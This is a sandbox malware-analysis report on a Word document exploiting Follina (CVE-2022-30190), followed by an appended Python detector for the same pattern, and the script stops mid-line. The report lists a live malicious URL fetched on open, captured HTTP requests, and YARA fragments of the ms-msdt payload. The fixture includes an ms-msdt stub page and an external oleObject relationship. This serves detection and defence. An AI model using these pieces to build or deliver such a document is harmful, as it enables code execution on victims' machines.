Windows Analysis Report
qoIZSkdejM

Overview

General Information

Sample Name: qoIZSkdejM (renamed file extension from none to docx)
Analysis ID: 686090
MD5: 0d37337ead8492e1b2395f6cd4f724fc
SHA1: a66ff1064025c026f2d88b87796009ba34c1bee8
SHA256: cd3132beed7d712a890f83dc302765bfa232e5b059a6fa7b4ee5355f11b55368
Tags: docx

Detection

Follina CVE-2022-30190
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Contains an external reference to another file
Detected suspicious Microsoft Office reference URL
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2536 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
Source: document.xml.rels
Rule: SUSP_Doc_WordXMLRels_May22
Description: Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard, Wojciech Cieslak
Strings:
  • 0x38:$a1: <Relationships
  • 0x2b5:$a2: TargetMode="External"
  • 0x2ad:$x1: .html!

Source: document.xml.rels
Rule: INDICATOR_OLE_RemoteTemplate
Description: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
Author: ditekSHen
Strings:
  • 0x26d:$olerel: relationships/oleObject
  • 0x286:$target1: Target="http
  • 0x2b5:$mode: TargetMode="External

Source: sslproxydump.pcap
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x37a7:$a: PCWDiagnostic
  • 0x379b:$sa3: ms-msdt
  • 0x381a:$sb3: IT_BrowseForFile=

Source: sslproxydump.pcap
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x378a:$re1: location.href = "ms-msdt:

Source: sslproxydump.pcap
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x198c:$a: PCWDiagnostic
  • 0x1980:$sa3: ms-msdt
  • 0x19ff:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x196f:$re1: location.href = "ms-msdt:

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x198c:$a: PCWDiagnostic
  • 0x1980:$sa3: ms-msdt
  • 0x19ff:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x196f:$re1: location.href = "ms-msdt:

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: qoIZSkdejM.docx | Avira: detected
Source: qoIZSkdejM.docx | Virustotal: Detection: 35%
Source: qoIZSkdejM.docx | Metadefender: Detection: 22%
Source: qoIZSkdejM.docx | ReversingLabs: Detection: 44%
Source: https://www.malwarejake.com/456.html | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm, type: DROPPED
Source: document.xml.rels | Extracted files from sample: https://www.malwarejake.com/456.html!
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49180 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49182 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49186 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49187 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49188 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: global traffic | DNS query: name: www.malwarejake.com
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
Source: global traffic | HTTP traffic detected:
  GET /456.html HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: www.malwarejake.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (conditional re-fetch of the same page):
  GET /456.html HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: www.malwarejake.com
  If-Modified-Since: Tue, 31 May 2022 01:57:49 GMT
  If-None-Match: "1b90-5e045198f8aaa"
  Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: LDCOMNETFR LDCOMNETFR
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49180 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49182 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49186 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49187 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49188 version: TLS 1.0
Source: unknown | Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown | Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown | Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown | Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown | Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown | Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown | Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown | Network traffic detected: HTTP traffic on port 49179 -> 443
Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.dr | String found in binary or memory: https://www.malwarejake.com/456.html
Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.dr | String found in binary or memory: https://www.malwarejake.com/456.htmlyX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C04F3D99-F9B9-4448-A2CE-FCD4E5583AFE}.tmp
Source: unknown | DNS traffic detected: queries for: www.malwarejake.com
Source: global traffic | HTTP traffic detected:
  GET /456.html HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: www.malwarejake.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (conditional re-fetch of the same page):
  GET /456.html HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: www.malwarejake.com
  If-Modified-Since: Tue, 31 May 2022 01:57:49 GMT
  If-None-Match: "1b90-5e045198f8aaa"
  Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49178 version: TLS 1.2

      System Summary

Source: document.xml.rels, type: SAMPLE | Matched rule: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents Author: ditekSHen
Source: sslproxydump.pcap, type: PCAP | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: sslproxydump.pcap, type: PCAP | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: document.xml.rels, type: SAMPLE | Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: document.xml.rels, type: SAMPLE | Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: qoIZSkdejM.docx | Virustotal: Detection: 35%
Source: qoIZSkdejM.docx | Metadefender: Detection: 22%
Source: qoIZSkdejM.docx | ReversingLabs: Detection: 44%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: qoIZSkdejM.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\qoIZSkdejM.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$IZSkdejM.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR76F3.tmp
Source: classification engine | Classification label: mal96.expl.evad.winDOCX@1/18@15/1
Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.dr | OLE document summary: author field not present or empty
Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: ~WRF{6D6953D1-CE9C-4DB1-815E-63A7D4CF5844}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False
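Added example, not part of the Joe Sandbox report and not the YARA rules it cites: a small offline Python triage script that reproduces the two file-side checks the matched rules describe. First, it unzips a .docx and reads word/_rels/document.xml.rels for an External relationship that Word follows automatically on open (the oleObject type) and whose Target ends in "!" (the shape of the extracted https://www.malwarejake.com/456.html! target); ordinary hyperlinks are External too but are only followed on click, so they are not flagged on their own. Second, it checks a fetched HTML page for the ms-msdt: protocol-handler URI. The .docx fixture, the attacker.invalid host and the HTML stub are constructed for the example; nothing is fetched from the network.

```python
"""Offline triage for the Follina (CVE-2022-30190) document pattern: an External
relationship in word/_rels/document.xml.rels that Word fetches on open and whose
Target ends in "!", plus an HTML page that navigates to an ms-msdt: URI.
Added example; not code from the Joe Sandbox report or the cited YARA rules."""

import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_PATH = "word/_rels/document.xml.rels"
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
DOC_REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Relationship types through which Word fetches a remote resource on open.
# oleObject is the type used by Follina lures; attachedTemplate is the older
# remote-template dropper pattern. Hyperlinks are External too but only
# followed on click, so they are not flagged by themselves.
# (Assumption: this short list is enough for a first-pass triage.)
FETCHING_REL_TYPES = {"oleObject", "attachedTemplate"}

# The protocol handler the Follina HTML stage invokes.
MSDT_URI = re.compile(r"ms-msdt:", re.IGNORECASE)


def suspicious_relationships(docx_bytes: bytes) -> list:
    """Return the External relationships that would make Word fetch a remote
    resource, each with the reasons it was flagged."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PATH not in zf.namelist():
            return hits
        root = ET.fromstring(zf.read(RELS_PATH))
    for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
        if rel.get("TargetMode") != "External":
            continue
        target = rel.get("Target", "")
        rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
        reasons = []
        if rel_type in FETCHING_REL_TYPES:
            reasons.append(f"auto-fetching relationship type {rel_type}")
        if target.endswith("!"):
            reasons.append("target ends with '!'")
        if not reasons:
            continue  # e.g. an ordinary hyperlink to a web page
        if re.search(r"\.html?(?:!|$)", target, re.IGNORECASE):
            reasons.append("remote .html target")
        hits.append({"id": rel.get("Id"), "type": rel_type,
                     "target": target, "reasons": reasons})
    return hits


def html_invokes_msdt(html: str) -> bool:
    """True if the fetched page carries an ms-msdt: URI anywhere in its body."""
    return MSDT_URI.search(html) is not None


def build_sample_docx(ole_target=None) -> bytes:
    """Construct a minimal .docx fixture (constructed; not the analysed sample).
    It always has a benign External hyperlink; when ole_target is given it also
    has an External oleObject relationship pointing there, as Follina lures did."""
    rels = [
        f'<Relationship Id="rId1" Type="{DOC_REL_NS}/hyperlink" '
        'Target="https://example.invalid/readme.html" TargetMode="External"/>'
    ]
    if ole_target is not None:
        rels.append(
            f'<Relationship Id="rId2" Type="{DOC_REL_NS}/oleObject" '
            f'Target="{ole_target}" TargetMode="External"/>'
        )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{PKG_REL_NS}">' + "".join(rels) + "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr(RELS_PATH, rels_xml)
    return buf.getvalue()


# Constructed stand-in for the fetched page; only the URI scheme matters here.
SAMPLE_HTML = ('<html><body><script>window.location.href = '
               '"ms-msdt:/id PCWDiagnostic";</script></body></html>')

if __name__ == "__main__":
    # attacker.invalid is a placeholder host; the report's real target was
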